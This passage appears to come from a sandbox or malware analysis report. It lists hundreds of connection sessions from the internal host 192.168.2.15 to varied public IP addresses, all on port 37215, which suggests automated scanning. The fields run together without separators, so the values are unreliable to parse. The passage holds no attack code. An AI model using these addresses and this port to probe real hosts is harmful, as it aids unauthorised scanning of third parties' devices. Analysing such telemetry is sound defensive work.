                                              4637192.168.2.1548178102.127.55.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4638192.168.2.1560632122.223.0.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4639192.168.2.1554580122.255.52.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4640192.168.2.1535932102.246.184.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4641192.168.2.154493071.102.41.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4642192.168.2.153856694.71.38.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4643192.168.2.1548720181.157.248.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4644192.168.2.155822437.248.31.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4645192.168.2.1548186138.113.29.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4646192.168.2.154795231.254.192.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4647192.168.2.155325231.39.78.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4648192.168.2.1534458157.98.169.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4649192.168.2.1552782102.159.168.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4650192.168.2.1560952190.81.55.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4651192.168.2.1541022157.55.86.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4652192.168.2.1540058181.141.5.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4653192.168.2.154184841.103.10.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4654192.168.2.1546910104.238.214.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4655192.168.2.1537448190.123.189.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4656192.168.2.1544110157.10.34.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4657192.168.2.154140052.71.148.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4658192.168.2.153555485.216.146.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4659192.168.2.1551258181.103.45.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4660192.168.2.155225841.215.160.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4661192.168.2.1541996122.68.205.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4662192.168.2.1552550102.53.78.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4663192.168.2.1549606190.162.142.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4664192.168.2.1540502181.111.3.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4665192.168.2.1540388190.80.249.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4666192.168.2.154999437.255.130.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4667192.168.2.154133041.130.138.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4668192.168.2.154512045.4.80.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4669192.168.2.1534034222.28.188.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4670192.168.2.1559956156.8.244.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4671192.168.2.1535082197.160.24.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4672192.168.2.1558726197.189.111.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4673192.168.2.1550032197.206.224.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4674192.168.2.1549626181.180.2.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4675192.168.2.1551306190.17.34.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4676192.168.2.1540616197.217.244.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4677192.168.2.1547302197.5.205.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4678192.168.2.154000437.232.244.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4679192.168.2.1540768186.125.212.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4680192.168.2.154983494.138.126.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4681192.168.2.1550230222.39.221.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4682192.168.2.153637894.54.113.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4683192.168.2.1542440122.2.223.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4684192.168.2.1554438102.23.128.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4685192.168.2.1560896197.29.91.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4686192.168.2.155201294.3.60.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4687192.168.2.1548718181.185.152.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4688192.168.2.1549026181.134.56.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4689192.168.2.1552268156.54.245.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4690192.168.2.154467294.203.69.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4691192.168.2.153851031.196.129.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4692192.168.2.1546140197.240.79.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4693192.168.2.153499445.26.255.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4694192.168.2.1538696197.165.5.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4695192.168.2.1536016156.244.200.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4696192.168.2.1545782141.45.85.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4697192.168.2.1537172122.105.55.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4698192.168.2.154620437.140.61.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4699192.168.2.154444294.242.115.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4700192.168.2.1551026156.165.27.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4701192.168.2.155225641.190.123.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4702192.168.2.156018441.212.113.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4703192.168.2.1542374156.132.231.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4704192.168.2.1550502181.79.20.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4705192.168.2.1552812197.134.85.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4706192.168.2.1543344186.49.57.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4707192.168.2.153817845.65.214.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4708192.168.2.1542286190.59.71.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4709192.168.2.1547940197.230.137.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4710192.168.2.154842694.47.246.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4711192.168.2.1536592222.209.50.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4712192.168.2.1551670138.205.33.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4713192.168.2.155016031.210.141.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4714192.168.2.154839445.34.251.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4715192.168.2.1559500186.51.178.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4716192.168.2.1554318190.99.160.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4717192.168.2.1556234157.6.9.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4718192.168.2.155447431.106.137.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4719192.168.2.153304431.195.100.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4720192.168.2.1543168157.43.180.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4721192.168.2.155930831.109.116.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4722192.168.2.1539402222.67.50.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4723192.168.2.1556492102.187.139.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4724192.168.2.1553454197.82.189.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4725192.168.2.1541992157.41.146.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4726192.168.2.1558410104.51.212.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4727192.168.2.1547620156.185.217.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4728192.168.2.1543682157.64.108.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4729192.168.2.155681231.223.211.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4730192.168.2.1533076138.27.46.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4731192.168.2.1534270138.251.87.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4732192.168.2.1539364161.237.83.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4733192.168.2.1554788122.165.173.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4734192.168.2.1539798157.33.114.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4735192.168.2.1538504222.94.203.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4736192.168.2.1553616169.133.175.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4737192.168.2.1541002157.61.69.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4738192.168.2.1534230181.144.6.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4739192.168.2.1543902186.79.66.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4740192.168.2.1545194206.130.150.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4741192.168.2.154119437.106.38.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4742192.168.2.1541360138.79.109.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4743192.168.2.155220231.27.92.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4744192.168.2.1558882190.235.2.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4745192.168.2.153408237.107.88.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4746192.168.2.1553926190.62.169.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4747192.168.2.1548120156.193.253.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4748192.168.2.155225261.152.207.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4749192.168.2.154462841.116.51.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4750192.168.2.1535438190.186.151.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4751192.168.2.1560252222.44.107.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4752192.168.2.155003037.220.118.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4753192.168.2.1560108222.144.135.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4754192.168.2.1559766157.9.202.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4755192.168.2.155745894.207.78.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4756192.168.2.1555604181.124.100.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4757192.168.2.1551082122.16.231.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4758192.168.2.1535286157.70.172.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4759192.168.2.1553876190.213.67.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4760192.168.2.1536244121.74.70.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4761192.168.2.1544206102.151.1.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4762192.168.2.1560590157.8.173.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4763192.168.2.154638837.9.198.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4764192.168.2.155105832.132.115.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4765192.168.2.1553006186.137.205.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4766192.168.2.154013241.76.221.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4767192.168.2.1534478102.67.152.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4768192.168.2.1556266181.139.238.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4769192.168.2.153789094.37.95.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4770192.168.2.153390841.90.74.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4771192.168.2.1549274181.169.196.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4772192.168.2.1534816156.155.23.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4773192.168.2.1548134122.36.55.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4774192.168.2.1550886157.157.166.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4775192.168.2.1560104203.53.89.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4776192.168.2.1560260157.249.69.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4777192.168.2.155534637.165.252.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4778192.168.2.1559272102.151.15.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4779192.168.2.154398631.212.40.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4780192.168.2.1547512186.210.3.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4781192.168.2.1543282197.35.79.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4782192.168.2.155014041.63.32.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4783192.168.2.1549162181.212.30.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4784192.168.2.1540516181.19.84.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4785192.168.2.1545728186.154.94.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4786192.168.2.1544128157.104.32.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4787192.168.2.153671445.29.68.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4788192.168.2.156065645.127.62.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4789192.168.2.1539604102.169.220.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4790192.168.2.153469041.180.100.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4791192.168.2.1541164197.106.39.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4792192.168.2.1541826157.8.78.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4793192.168.2.1545508197.89.58.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4794192.168.2.154291241.197.226.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4795192.168.2.1558654222.11.47.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4796192.168.2.1554150157.155.236.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4797192.168.2.1553708186.97.12.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4798192.168.2.153294645.0.101.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4799192.168.2.154642231.248.178.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4800192.168.2.1542562157.107.191.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4801192.168.2.1555464121.114.118.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4802192.168.2.1540626102.225.207.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4803192.168.2.1539490156.29.32.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4804192.168.2.1534978193.87.201.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4805192.168.2.1536850197.61.236.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4806192.168.2.1547474121.194.27.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4807192.168.2.1545458190.49.102.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4808192.168.2.1545460190.100.11.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4809192.168.2.1533674207.156.125.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4810192.168.2.1559914103.66.108.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4811192.168.2.1536618138.47.24.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4812192.168.2.1540824197.30.51.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4813192.168.2.153574294.92.59.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4814192.168.2.1556554102.64.116.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4815192.168.2.1550940162.93.213.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4816192.168.2.153842845.64.131.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4817192.168.2.1545542138.232.96.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4818192.168.2.1558304190.250.189.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4819192.168.2.1543166186.171.180.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4820192.168.2.1533676186.106.104.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4821192.168.2.1546082157.128.72.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4822192.168.2.1558248181.75.218.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4823192.168.2.1533084156.170.55.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4824192.168.2.1555250186.45.56.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4825192.168.2.1552932190.143.5.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4826192.168.2.1536054186.77.218.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4827192.168.2.1544768121.154.135.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4828192.168.2.155083841.217.220.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4829192.168.2.1553496157.75.156.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4830192.168.2.1552178138.21.212.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4831192.168.2.1534328197.144.5.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4832192.168.2.1533674186.15.22.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4833192.168.2.1546532157.130.26.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4834192.168.2.1537422157.193.56.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4835192.168.2.1533536121.109.212.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4836192.168.2.1559772122.179.139.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4837192.168.2.1550096122.147.16.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4838192.168.2.154912094.38.139.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4839192.168.2.1533302197.2.78.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4840192.168.2.1549112222.66.151.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4841192.168.2.1557868192.152.135.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4842192.168.2.154867241.251.146.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4843192.168.2.155430831.53.213.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4844192.168.2.154940894.77.44.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4845192.168.2.1546742122.177.178.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4846192.168.2.1556884201.115.132.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4847192.168.2.1553642181.34.235.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4848192.168.2.1539428121.176.211.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4849192.168.2.1548032156.185.206.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4850192.168.2.1554138181.97.163.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4851192.168.2.1549464122.29.168.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4852192.168.2.1534322222.65.217.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4853192.168.2.153424837.199.201.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4854192.168.2.1535286186.91.38.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4855192.168.2.1541010193.89.43.13037215
